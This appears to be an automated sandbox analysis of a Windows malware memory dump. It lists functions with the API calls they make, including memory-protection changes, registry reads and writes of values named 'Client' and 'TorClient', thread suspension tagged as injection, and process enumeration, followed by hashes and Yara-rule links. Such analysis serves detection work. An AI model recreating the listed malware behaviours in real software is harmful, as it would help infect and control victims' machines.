Opcode Fuzzy Hash: 5b121a6d3ef9ac41f52f48203840b51947d5c092297b6b1a0d7914f65f2f8249
Instruction Fuzzy Hash: 68114CB2515209FFDF019F94DC84DAE7B7EFB98358B11082AF90193160DA719D51EB60

Uniqueness

Uniqueness Score: -1.00%

Function 009D5277, Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,00000000,00000040,00000004,00000000,?,00000000,00000000,?,?,009B619F,00000004,00000000,?,00000000,009BB275), ref: 009D529C
GetLastError.KERNEL32(?,00000000,00000000,?,?,009B619F,00000004,00000000,?,00000000,009BB275,?,?), ref: 009D52A4
VirtualQuery.KERNEL32(?,00000000,0000001C,?,00000000,00000000,?,?,009B619F,00000004,00000000,?,00000000,009BB275,?,?), ref: 009D52BB
VirtualProtect.KERNEL32(?,00000000,-392CC87E,00000004,?,00000000,00000000,?,?,009B619F,00000004,00000000,?,00000000,009BB275,?), ref: 009D52E0
SetLastError.KERNEL32(00000000,?,00000000,00000000,?,?,009B619F,00000004,00000000,?,00000000,009BB275,?,?), ref: 009D52E9

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Virtual$ErrorLastProtect$Query
String ID:
API String ID: 148356745-0
Opcode ID: 7b4c25600c4a39e52c07e6bf899c33222ea1c62414d4278035dd04d9b9f78728
Instruction ID: 70f4081b748607286b102573b405c164160a56bc0c9cd707063187b6b8e948b3
Opcode Fuzzy Hash: 7b4c25600c4a39e52c07e6bf899c33222ea1c62414d4278035dd04d9b9f78728
Instruction Fuzzy Hash: AE014C3254510ABF9F119FA5DC808ABBBBDFF083547018026FA1193260DB719959EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009C44DC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79registryCOMMON

Download Yara Rule

APIs

Part of subcall function 009B810A: RegCreateKeyA.ADVAPI32(80000001,06288900,?), ref: 009B811F
Part of subcall function 009B810A: lstrlen.KERNEL32(06288900,00000000,00000000,?,?,009C79A9,00000000,?), ref: 009B814D

RegQueryValueExA.KERNELBASE(?,Client,00000000,009B20D2,009DD06C,?,00000001,?,747DF710,00000000,00000000,009B20D2,?), ref: 009C4527
RegSetValueExA.KERNELBASE(?,Client,00000000,00000003,009DD06C,00000028), ref: 009C4566
RegCloseKey.ADVAPI32(?), ref: 009C4572

Strings

Client, xrefs: 009C450E, 009C4520, 009C4562, 009C4591

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Value$CloseCreateQuerylstrlen
String ID: Client
API String ID: 2552977122-3236430179
Opcode ID: 2af6e7da8f1111d55752c18be2b43cd6350e71ca06c51104df61912bbf5709af
Instruction ID: 3b5035c66adef5138e0dcf599742c3e8314a4140f7b057e369d753eeb12d2315
Opcode Fuzzy Hash: 2af6e7da8f1111d55752c18be2b43cd6350e71ca06c51104df61912bbf5709af
Instruction Fuzzy Hash: BB214B75E96208EFDB20AF95DC15BAA7BBCEB84750F00802BF504A6250D7709A82DF61

Uniqueness

Uniqueness Score: -1.00%

Function 009BF792, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 009C7854: lstrlenW.KERNEL32(004F0053,System,00000000,00000000,?,?,009BF7B7,004F0053,00000000), ref: 009C7860
Part of subcall function 009C7854: memcpy.NTDLL(00000000,004F0053,00000000,00000002,?,?,009BF7B7,004F0053,00000000), ref: 009C7888
Part of subcall function 009C7854: memset.NTDLL ref: 009C789A

RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,?,006E0049,System,004F0053,00000000), ref: 009BF7E8
RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,00000000,00000004), ref: 009BF804
RegCloseKey.KERNELBASE(?), ref: 009BF815

Strings

System, xrefs: 009BF7C8

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CloseOpenQueryValuelstrlenmemcpymemset
String ID: System
API String ID: 830012212-3470857405
Opcode ID: 3ac9835bdaf9f1e09740729e3641424709e017e2a21513281a2d60515af5874a
Instruction ID: 7b29646cb4b9262c32e6a83e834d9103e8e0639c7b40676a0e048d0df0af9fb9
Opcode Fuzzy Hash: 3ac9835bdaf9f1e09740729e3641424709e017e2a21513281a2d60515af5874a
Instruction Fuzzy Hash: D1117072A04208BFEB01DBE4DC85FAEB7BCEB44304F10406AA605E7151D770EA44DB25

Uniqueness

Uniqueness Score: -1.00%

Function 009BDBF0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55registryCOMMON

Download Yara Rule

APIs

Part of subcall function 009B810A: RegCreateKeyA.ADVAPI32(80000001,06288900,?), ref: 009B811F
Part of subcall function 009B810A: lstrlen.KERNEL32(06288900,00000000,00000000,?,?,009C79A9,00000000,?), ref: 009B814D

RegQueryValueExA.KERNELBASE(?,System,00000000,?,?,?,00000001,?,747DF710,00000000,?,?,?,009B20D2,?), ref: 009BDC2E
RegSetValueExA.KERNELBASE(?,System,00000000,00000003,?,00000010,?,?,?,009B20D2,?), ref: 009BDC60
RegCloseKey.ADVAPI32(?,?,?,?,009B20D2,?), ref: 009BDC82

Strings

System, xrefs: 009BDC1E, 009BDC23, 009BDC5C

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Value$CloseCreateQuerylstrlen
String ID: System
API String ID: 2552977122-3470857405
Opcode ID: 4992cb2af2daacec4ab33a87f8d948ce8a45523e16361bdcb909311866ec6746
Instruction ID: bd2fdb8ec84401aaf39093ad9191d8cebe0b5e6451b6935a4c33d9fabe2b153f
Opcode Fuzzy Hash: 4992cb2af2daacec4ab33a87f8d948ce8a45523e16361bdcb909311866ec6746
Instruction Fuzzy Hash: C0113A71E55208FAEF10ABA5CD45FEEBBBCEB48714F004066E504A6190E7B05A40DB50

Uniqueness

Uniqueness Score: -1.00%

Function 009B1300, Relevance: 6.1, APIs: 4, Instructions: 110threadsynchronizationinjectionCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 009B132E
ResumeThread.KERNELBASE(?,?,?,?,?,00000004,?), ref: 009B13B8
WaitForSingleObject.KERNEL32(00000064,?,?,?,?,00000004,?), ref: 009B13C6
SuspendThread.KERNELBASE(?,?,?,?,?,00000004,?), ref: 009B13D9

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Thread$ObjectResumeSingleSuspendWaitmemset
String ID:
API String ID: 3168247402-0
Opcode ID: 162fd837f8ccfc34cd5d2c5de06ecd9c5a6ae06c9b70c3d2ce7111fdd4bc1121
Instruction ID: b0cd9f4c24b1cc2948b54a7ad029bb32b50cd844322fd1c6cae1458131c898c1
Opcode Fuzzy Hash: 162fd837f8ccfc34cd5d2c5de06ecd9c5a6ae06c9b70c3d2ce7111fdd4bc1121
Instruction Fuzzy Hash: 24416A71108301AFE721EF54CD41EABBBEAFF88360F44492DFA94821A1D771D9588B66

Uniqueness

Uniqueness Score: -1.00%

Function 009B8CA2, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?), ref: 009B8CF4
memcpy.NTDLL(?,?,?,?,?,?), ref: 009B8D85
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 009B8DA0

Strings

Dec 21 2020, xrefs: 009B8D15

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Dec 21 2020
API String ID: 4010158826-582694290
Opcode ID: d29c04576dafe914c26dc81b577a94f7502a08a0d57335ef1a685fdabc7d4021
Instruction ID: 9d2f0a6b06921f01b934fcce2f241812223f661fbc486ff3ba667269c29ec22b
Opcode Fuzzy Hash: d29c04576dafe914c26dc81b577a94f7502a08a0d57335ef1a685fdabc7d4021
Instruction Fuzzy Hash: 1E313231E40219ABDB00DF94C981BEEB7B9EF48314F14056AE505FB2C1D775AA46DB90

Uniqueness

Uniqueness Score: -1.00%

Function 009BED95, Relevance: 6.1, APIs: 4, Instructions: 64memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE(009CE8CE,?,00000000,009CE8CE,00000000,?,00000000,?,?,?,?,009CE8CE,?,Client32,?,?), ref: 009BEDBA
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 009BEDD1
HeapFree.KERNEL32(00000000,00000000,?,?,?,009CE8CE,?,Client32,?,?,?,009C15E7), ref: 009BEDEC
RegQueryValueExA.KERNELBASE(009CE8CE,?,00000000,009CE8CE,00000000,?,?,?,?,009CE8CE,?,Client32,?,?,?,009C15E7), ref: 009BEE0B

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: HeapQueryValue$AllocateFree
String ID:
API String ID: 4267586637-0
Opcode ID: c4390ecca21881f5582c1c6cfbe04edfbc0741bd34c571d01eddaeffaaec32c1
Instruction ID: 644143f8f0b00f1a9b9829c3f14b8d4e0a08f79ba0310448f2792c40f75c9748
Opcode Fuzzy Hash: c4390ecca21881f5582c1c6cfbe04edfbc0741bd34c571d01eddaeffaaec32c1
Instruction Fuzzy Hash: 40118CB6511118FFDB12CF88DD84CEEBBBCEB88360B104456F801A2250D6B15E40EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009C1F00, Relevance: 6.0, APIs: 4, Instructions: 42stringCOMMON

Download Yara Rule

APIs

Part of subcall function 009D247D: RtlAllocateHeap.NTDLL(00000000,00000200,009C6D11), ref: 009D2489

GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,009DE088,00000000,009BD9F2,?,009B9809,?), ref: 009C1F1F
PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,009DE088,00000000,009BD9F2,?,009B9809,?), ref: 009C1F2A
_wcsupr.NTDLL ref: 009C1F37
lstrlenW.KERNEL32(00000000), ref: 009C1F3F

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
String ID:
API String ID: 2533608484-0
Opcode ID: 7b35b69d166d1902670b075b214777c8d04cda0db024042cca33b89e5a9736ce
Instruction ID: 3c9391736d85d04cea79e18fa6dcf8d0d75b211155aaa83d47c9d4552519e5e4
Opcode Fuzzy Hash: 7b35b69d166d1902670b075b214777c8d04cda0db024042cca33b89e5a9736ce
Instruction Fuzzy Hash: B8F0593165E1101E93126B71ADC9F2F5B5CEBC3BA0B20003EF900C2152CF60CC00916A

Uniqueness

Uniqueness Score: -1.00%

Function 009C046A, Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 009C0489

Part of subcall function 009CB674: RtlEnterCriticalSection.NTDLL(00000000), ref: 009CB680
Part of subcall function 009CB674: CloseHandle.KERNEL32(?), ref: 009CB68E
Part of subcall function 009CB674: RtlLeaveCriticalSection.NTDLL(00000000), ref: 009CB6AA

FindCloseChangeNotification.KERNELBASE(?), ref: 009C0497
InterlockedDecrement.KERNEL32(009DDF5C), ref: 009C04A6

Part of subcall function 009D25A3: SetEvent.KERNEL32(00000360,009C04C1), ref: 009D25AD
Part of subcall function 009D25A3: CloseHandle.KERNEL32(00000360), ref: 009D25C2
Part of subcall function 009D25A3: HeapDestroy.KERNELBASE(05E90000), ref: 009D25D2

RtlExitUserThread.NTDLL(00000000), ref: 009C04C2

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Close$CriticalHandleSection$ChangeDecrementDestroyEnterEventExitFindHeapInterlockedLeaveMultipleNotificationObjectsThreadUserWait
String ID:
API String ID: 2993087875-0
Opcode ID: 469547200f6705989d18de981fc129367a2287bb6d6af5ea6b24f4bfa849c97f
Instruction ID: 57cd8f8d5941f53278c57048f2dfef1d1121e72ec49ebc586886de46e0cf4fb2
Opcode Fuzzy Hash: 469547200f6705989d18de981fc129367a2287bb6d6af5ea6b24f4bfa849c97f
Instruction Fuzzy Hash: EFF0F430696200EBC7016B28DC0AFAA3B7CEB81730F10021EF619972E0EBB059418762

Uniqueness

Uniqueness Score: -1.00%

Function 009D1B53, Relevance: 4.5, APIs: 3, Instructions: 49memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(009DD514,00000000,?,?,?,009C00D4,00000000,?,?,009DD514,?,009DA578,00000018,009C3B8C,00000000,00000002), ref: 009D1B85
VirtualProtect.KERNELBASE(009DD514,00000004,00000040,00000000,00000000,00000000,?,?,?,009C00D4,00000000,?,?,009DD514,?,009DA578), ref: 009D1B9F
VirtualProtect.KERNELBASE(009DD514,00000004,00000000,00000000,?,?,?,009C00D4,00000000,?,?,009DD514,?,009DA578,00000018,009C3B8C), ref: 009D1BD2

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: ProtectVirtual$lstrlen
String ID:
API String ID: 386137988-0
Opcode ID: 40a09a01d5621cbb7cf7abd8fbf3f98e243a0af32952fc3f2c5387d08bdc306e
Instruction ID: 7c8174f0ebf440043512b892b7ab57cf0923c3c0de69bc2e77c214c1ae667980
Opcode Fuzzy Hash: 40a09a01d5621cbb7cf7abd8fbf3f98e243a0af32952fc3f2c5387d08bdc306e
Instruction Fuzzy Hash: 8D1179B2945208FFEB10CF55C881F9EBBB8EF05760F10804AE9059B215D3B8DA84DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 009B810A, Relevance: 4.5, APIs: 3, Instructions: 39registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,06288900,?), ref: 009B811F
RegOpenKeyA.ADVAPI32(80000001,06288900,?), ref: 009B812C
lstrlen.KERNEL32(06288900,00000000,00000000,?,?,009C79A9,00000000,?), ref: 009B814D

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CreateOpenlstrlen
String ID:
API String ID: 2865187142-0
Opcode ID: b239ca7ff2d18c95b3242aca89ab07ea633858b98476776ed344d2eaf459ac04
Instruction ID: 64eeb0873addd79d4aa680bf38a9811dceeabc3532367d4d7d4b53e692200550
Opcode Fuzzy Hash: b239ca7ff2d18c95b3242aca89ab07ea633858b98476776ed344d2eaf459ac04
Instruction Fuzzy Hash: 18F09675019204FFE7109F54CC88EEB7BBCEF493B4F108016FD4692240DA749984C660

Uniqueness

Uniqueness Score: -1.00%

Function 009C33D3, Relevance: 4.5, APIs: 3, Instructions: 33COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,009B4655,00000000), ref: 009C33EE
IsWow64Process.KERNEL32(?,?,?,?,?,?,009B4655,00000000), ref: 009C33FF
FindCloseChangeNotification.KERNELBASE(?,?,?,?,009B4655,00000000), ref: 009C3412

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Process$ChangeCloseFindNotificationOpenWow64
String ID:
API String ID: 3805842350-0
Opcode ID: 79874c5e09a0b093533bb504a718b8af3d7abad153b9732e6373e5c081a3e7da
Instruction ID: d83e6c01f712894258049eed91ad061471a68a886d24d1a368627d1858e4639e
Opcode Fuzzy Hash: 79874c5e09a0b093533bb504a718b8af3d7abad153b9732e6373e5c081a3e7da
Instruction Fuzzy Hash: CFF05E71905514FF87129F59CC04DEFBBACEB85791B10C16AE904A3110E7308F4197A1

Uniqueness

Uniqueness Score: -1.00%

Function 009D25A3, Relevance: 4.5, APIs: 3, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(00000360,009C04C1), ref: 009D25AD

Part of subcall function 009BA87A: SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,009D25B8), ref: 009BA8A3
Part of subcall function 009BA87A: RtlDeleteCriticalSection.NTDLL(009DE220), ref: 009BA8D6
Part of subcall function 009BA87A: RtlDeleteCriticalSection.NTDLL(009DE240), ref: 009BA8DD
Part of subcall function 009BA87A: CloseHandle.KERNEL32(?,?,009D25B8), ref: 009BA90C
Part of subcall function 009BA87A: ReleaseMutex.KERNEL32(00000234,00000000,?,?,?,009D25B8), ref: 009BA91D
Part of subcall function 009BA87A: CloseHandle.KERNEL32(?,?,009D25B8), ref: 009BA929
Part of subcall function 009BA87A: ResetEvent.KERNEL32(00000000,00000000,?,?,?,009D25B8), ref: 009BA935
Part of subcall function 009BA87A: CloseHandle.KERNEL32(?,?,009D25B8), ref: 009BA941
Part of subcall function 009BA87A: SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,009D25B8), ref: 009BA947
Part of subcall function 009BA87A: SleepEx.KERNEL32(00000064,00000001,?,?,009D25B8), ref: 009BA95B
Part of subcall function 009BA87A: HeapFree.KERNEL32(00000000,00000000,?,?,009D25B8), ref: 009BA97E
Part of subcall function 009BA87A: RtlRemoveVectoredExceptionHandler.NTDLL(00CE2668), ref: 009BA9B7

CloseHandle.KERNEL32(00000360), ref: 009D25C2
HeapDestroy.KERNELBASE(05E90000), ref: 009D25D2

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CloseHandle$Sleep$CriticalDeleteEventHeapSection$DestroyExceptionFreeHandlerMutexReleaseRemoveResetVectored
String ID:
API String ID: 1636361345-0
Opcode ID: e713bb7e49d4cc3e34687fbe17ef2a1a5fba854d0cabb8f63c13b6b9b7d96a8a
Instruction ID: ab71feb517840b4c21c7716382ab2b422483c4080f6dc1ed9209290ad55d75fc
Opcode Fuzzy Hash: e713bb7e49d4cc3e34687fbe17ef2a1a5fba854d0cabb8f63c13b6b9b7d96a8a
Instruction Fuzzy Hash: 5FE0E2746FA2008BEB00AB35EC9CE5737ACAB203423084452F409C62A1DE34C8C9FA20

Uniqueness

Uniqueness Score: -1.00%

Function 009B614C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(41564441,00000000,?,00000000,009BB275,?,?,00000000,?,?,00000001,00000000,?,00000001,009D83E4,00000002), ref: 009B6161

Strings

t, xrefs: 009B6161

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: HandleModule
String ID: t
API String ID: 4139908857-2238339752
Opcode ID: 4097eb87f2a08fc1df1491656a4746b1c439b7b0cbb343ca6a383ee181803008
Instruction ID: 011dbedd512d0708138066a1e0d6d69f28da5ee073175bf89467f493b2dddec9
Opcode Fuzzy Hash: 4097eb87f2a08fc1df1491656a4746b1c439b7b0cbb343ca6a383ee181803008
Instruction Fuzzy Hash: 7421B5B6E45108AFDB20EF9CD981ADD7BBDFB44324F14846AE615EB242C634BD41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 009C3B01, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000000,009DD514,00000000,?,?,009B619F,00000004,00000000,?,00000000,009BB275,?,?), ref: 009C3B3C

Part of subcall function 009CCD7A: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,009DE240), ref: 009CCD91

Strings

t, xrefs: 009C3B3C

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: HandleInformationModuleProcessQuery
String ID: t
API String ID: 2776635927-2238339752
Opcode ID: ac519e4915c2174bf0453546d0359a68489ec993127ca3412a41c7996a188340
Instruction ID: 2c0613a555e86321a6fa75ff2abeeb8219e54ce9a7184ab1ac3331afbe53537d
Opcode Fuzzy Hash: ac519e4915c2174bf0453546d0359a68489ec993127ca3412a41c7996a188340
Instruction Fuzzy Hash: 23213571A10604AFDB20CF59C884F7A77B8EB453A0728C42DF94A8B251D731EE40DB61

Uniqueness

Uniqueness Score: -1.00%

Function 009B9F4D, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009C672D: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,009B1CDF,00000000,00000000,?,?,00000000,?,?,?,009B1CDF,TorClient), ref: 009C6765
Part of subcall function 009C672D: RtlAllocateHeap.NTDLL(00000000,009B1CDF), ref: 009C6779
Part of subcall function 009C672D: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,009B1CDF,?,?,?,009B1CDF,TorClient,?,?), ref: 009C6793
Part of subcall function 009C672D: RegCloseKey.KERNELBASE(?,?,?,?,009B1CDF,TorClient,?,?), ref: 009C67BD

HeapFree.KERNEL32(00000000,?,?,Ini,?,?,747DF710,00000000,00000000,?,?,?,009D58BA,?), ref: 009B9FDB

Part of subcall function 009C5B0D: memcpy.NTDLL(?,?,00000000,?,?,?,00000000,?,009D19D8,00000000,00000001,-00000007,?,00000000), ref: 009C5B2F

Strings

Ini, xrefs: 009B9F5D

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: HeapQueryValue$AllocateCloseFreememcpy
String ID: Ini
API String ID: 1301464996-1327165576
Opcode ID: 3f32bd522ab7a76f3ec8814eb4f1d563af2bbee5d0f5551c1d23fb2b9b3e0035
Instruction ID: 26e0f2d43a99bcf049b55274676a63ac6ddc25318006e7d58a8785c771053ee8
Opcode Fuzzy Hash: 3f32bd522ab7a76f3ec8814eb4f1d563af2bbee5d0f5551c1d23fb2b9b3e0035
Instruction Fuzzy Hash: C7119A75664205ABDB109B49DE81FFE7BA8EB89330F204426F602EB291D670AD409B61

Uniqueness

Uniqueness Score: -1.00%

Function 009C2A2E, Relevance: 3.1, APIs: 2, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 009D247D: RtlAllocateHeap.NTDLL(00000000,00000200,009C6D11), ref: 009D2489

EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,00000000,00000003,00000000,00000000), ref: 009C2A5E
GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,00000000,00000003,00000000), ref: 009C2AA5

Part of subcall function 009C4FB0: HeapFree.KERNEL32(00000000,00000200,009C6EB2,00000000,00000100,00000200), ref: 009C4FBC

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
String ID:
API String ID: 552344955-0
Opcode ID: deee638956715dcb8aa4b4efb921aac020e37a93e4ff93c4085321625467cd9e
Instruction ID: 76ac4a2a97b464ebb18ebf02890eb894c6f38e5ba3e9b2bc302592bb7857653f
Opcode Fuzzy Hash: deee638956715dcb8aa4b4efb921aac020e37a93e4ff93c4085321625467cd9e
Instruction Fuzzy Hash: 8A117071D00208ABCB219FA9D844F9EBBBDEF95754F20805DE41497290DB748E45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 009CCF2A, Relevance: 3.1, APIs: 2, Instructions: 54memorytimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,?,?,63699BC3,00000000,009C7CE2,?), ref: 009CCF67
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,009C7CE2,?,?), ref: 009CCFC8

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Time$FileFreeHeapSystem
String ID:
API String ID: 892271797-0
Opcode ID: 017580f04debdb166dfb424ddd6407d3a87fd435c8f4c0c5d5dea69778ea22cb
Instruction ID: 02b8965d759f8339b78f069ffddb15fbf55a934b3250249fe0e3c508adbedb1f
Opcode Fuzzy Hash: 017580f04debdb166dfb424ddd6407d3a87fd435c8f4c0c5d5dea69778ea22cb
Instruction Fuzzy Hash: 63113AB5D55209EBDF00EFA0DE45FDEBBBDEB04301F10009AE506E2151DB74AA84DB62

Uniqueness

Uniqueness Score: -1.00%

Function 009C64FD, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009C672D: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,009B1CDF,00000000,00000000,?,?,00000000,?,?,?,009B1CDF,TorClient), ref: 009C6765
Part of subcall function 009C672D: RtlAllocateHeap.NTDLL(00000000,009B1CDF), ref: 009C6779
Part of subcall function 009C672D: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,009B1CDF,?,?,?,009B1CDF,TorClient,?,?), ref: 009C6793
Part of subcall function 009C672D: RegCloseKey.KERNELBASE(?,?,?,?,009B1CDF,TorClient,?,?), ref: 009C67BD

HeapFree.KERNEL32(00000000,00000000,00000000,1795F247,Kill,00000000,?,?,?,00000000,009C7E8C,009C046A,00000000,00000000), ref: 009C6568

Part of subcall function 009B80B6: StrChrA.SHLWAPI(?,0000002E,?,?,?,00000000,009B6281,00000000), ref: 009B80C8
Part of subcall function 009B80B6: StrChrA.SHLWAPI(?,00000020,?,?,00000000,009B6281,00000000), ref: 009B80D7

Part of subcall function 009BA7B1: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,747DF5B0,009C7D3D,61636F4C,00000001,?,?), ref: 009BA7D7
Part of subcall function 009BA7B1: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 009BA7E3
Part of subcall function 009BA7B1: GetModuleHandleA.KERNEL32(KERNEL32.DLL,ExitProcess,?,00000000,00000000), ref: 009BA7FA
Part of subcall function 009BA7B1: GetProcAddress.KERNEL32(00000000), ref: 009BA801
Part of subcall function 009BA7B1: Thread32First.KERNEL32(?,0000001C), ref: 009BA811
Part of subcall function 009BA7B1: CloseHandle.KERNEL32(?), ref: 009BA859

Strings

Kill, xrefs: 009C650A

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
String ID: Kill
API String ID: 2627809124-2803628375
Opcode ID: 34df944f434a51aa5471c47308d59b50cca6b391d54a818d20acfba9c604094e
Instruction ID: 18478262655e9ff0b3a2a04c5681e3ca1c63277550d501bc6415d379d4866333
Opcode Fuzzy Hash: 34df944f434a51aa5471c47308d59b50cca6b391d54a818d20acfba9c604094e
Instruction Fuzzy Hash: F201F9B5965108FF8F01ABA4DD85EDFBFBDEB40354710006AF401A2111DA719E40D621

Uniqueness

Uniqueness Score: -1.00%

Function 009CCE39, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009C672D: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,009B1CDF,00000000,00000000,?,?,00000000,?,?,?,009B1CDF,TorClient), ref: 009C6765
Part of subcall function 009C672D: RtlAllocateHeap.NTDLL(00000000,009B1CDF), ref: 009C6779
Part of subcall function 009C672D: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,009B1CDF,?,?,?,009B1CDF,TorClient,?,?), ref: 009C6793
Part of subcall function 009C672D: RegCloseKey.KERNELBASE(?,?,?,?,009B1CDF,TorClient,?,?), ref: 009C67BD

HeapFree.KERNEL32(00000000,00000000,00000000,Scr,00000000,?,?,?,00000000,009C7E87,009C046A,00000000,00000000), ref: 009CCEAB

Part of subcall function 009B80B6: StrChrA.SHLWAPI(?,0000002E,?,?,?,00000000,009B6281,00000000), ref: 009B80C8
Part of subcall function 009B80B6: StrChrA.SHLWAPI(?,00000020,?,?,00000000,009B6281,00000000), ref: 009B80D7

Part of subcall function 009B94B4: lstrlen.KERNEL32(?,00000000,00000000,74785520,?,?,?,009B1647,0000010D,00000000,00000000), ref: 009B94E4
Part of subcall function 009B94B4: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 009B94FA
Part of subcall function 009B94B4: memcpy.NTDLL(00000010,?,00000000,?,?,?,009B1647,0000010D), ref: 009B9530
Part of subcall function 009B94B4: memcpy.NTDLL(00000010,00000000,009B1647,?,?,?,009B1647), ref: 009B954B
Part of subcall function 009B94B4: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000119,00000001), ref: 009B9569
Part of subcall function 009B94B4: GetLastError.KERNEL32(?,?,?,009B1647), ref: 009B9573
Part of subcall function 009B94B4: HeapFree.KERNEL32(00000000,00000000,?,?,?,009B1647), ref: 009B9599

Strings

Scr, xrefs: 009CCE46

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

